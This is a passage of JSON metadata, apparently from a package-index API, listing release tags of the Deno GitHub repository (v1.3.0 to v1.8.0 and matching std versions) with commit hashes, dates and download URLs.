/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manife